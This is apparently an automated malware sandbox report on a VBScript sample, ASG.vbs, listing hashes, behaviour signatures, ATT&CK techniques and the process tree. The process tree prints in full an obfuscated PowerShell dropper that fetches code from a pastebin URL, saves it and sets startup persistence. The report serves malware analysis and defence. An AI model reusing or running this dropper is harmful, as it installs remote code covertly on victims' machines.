Overview

overview

10

Static

static

ASG.vbs

windows7_x64

10

ASG.vbs

windows10_x64

10

Analysis

  • max time kernel
    25s
  • max time network
    24s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    07-05-2021 10:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ASG.vbs

  • Size

    9KB

  • MD5

    0a2a8aa3944b6f377ac18361e351ab26

  • SHA1

    7d647c28efd45c8f0c38d30235308187e5f96d29

  • SHA256

    9901fffc81769726c5217dfc2db580c1b67ad476f59451f9af8254c66966dafa

  • SHA512

    1d66f8ce7d30e0f462a8751d98dbddc561908171728ba44fb56145cd03e4f18659c6e7fb151e27714f38990ac4e973773f36f246a1c680b1288cc089cadcf4e8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/y3Yp0yTh

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ASG.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -WindowStyle Hidden -Command "IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,121,51,89,112,48,121,84,104,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1148
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:952

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1
T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    494c9d0996992e82df7744b673d033b3

    SHA1

    78bc019b9217fc1b2d5a4d3f9a7938502eef7a3c

    SHA256

    c6700dde9391fb2b10518f956c1e6d3eff7770f611cb6083c5ab9e32ef507eb5

    SHA512

    455214e434e2c0cb4d4f0e02f5e2af103208c31ed91632280205508075e9e3e53fe2f6e8341ea98ed2ce370213cb4ddcdb48f13563e7509f5be3195aaf1e1482

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\1.bat
    MD5

    e39cc313b782f4cf064af5388262eb81

    SHA1

    9187257f07e28f14f6b782c50a25edafa17106fa

    SHA256

    2f0661d6cab09560d9441fd8213e6d79d57f7f369a340b41404064bb69359e37

    SHA512

    3d67f7dccd4ae56cdbf078fab17c0ce569e754694972d7d26bf7a19a524bdb552b548d845d44ef355a23a5a5be624366ceef60c797a0b3147f676194c748322e

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
    MD5

    4f95a975b942949d4f39fb63af105d97

    SHA1

    b9e39ef492d708a567192a766c39b43de8750a3c

    SHA256

    6a5b719d891f1eb61d97257cec527d2dfd7a480cb62dce353fbc445306e17cde

    SHA512

    8ea9e26c03b475fc6d4ffd0a00db0513c123f574a34c546af5341d4791dbc5707b5870f037bfb02628ed0be4c446f6d9f35b50d3deb47a7c86aab25b10b0f6c7

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    2f99e0b0ef3b216a62ff49351c173875

    SHA1

    3c27d007db731effc4135a5ecbb25c5295fa0efb

    SHA256

    e7ac82d1d51d2f62c3a29f9a5690ef82f6139fcc0ae5db81d9201b2bcbfea4ca

    SHA512

    2e91b32eb29bc2883f18661d06a48994b47dcdba69b2305e7cb65ca36b319b00068290ac7a0b63584b54a69c6b7c04b4e01bd5b3f92b73155931dc55a1d15ca0

    Download Submit
  • memory/952-71-0x0000000000000000-mapping.dmp
    Download
  • memory/952-79-0x000000001AC84000-0x000000001AC86000-memory.dmp
    Filesize

    8KB

    Download
  • memory/952-78-0x000000001AC80000-0x000000001AC82000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1148-64-0x00000000026E0000-0x00000000026E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1148-68-0x000000001AA84000-0x000000001AA86000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1148-69-0x0000000002520000-0x0000000002521000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1148-70-0x000000001B470000-0x000000001B471000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1148-67-0x000000001AA80000-0x000000001AA82000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1148-66-0x0000000002400000-0x0000000002401000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1148-65-0x000000001AB00000-0x000000001AB01000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1148-62-0x0000000000000000-mapping.dmp
    Download
  • memory/1640-59-0x000007FEFC0C1000-0x000007FEFC0C3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1732-60-0x0000000000000000-mapping.dmp
    Download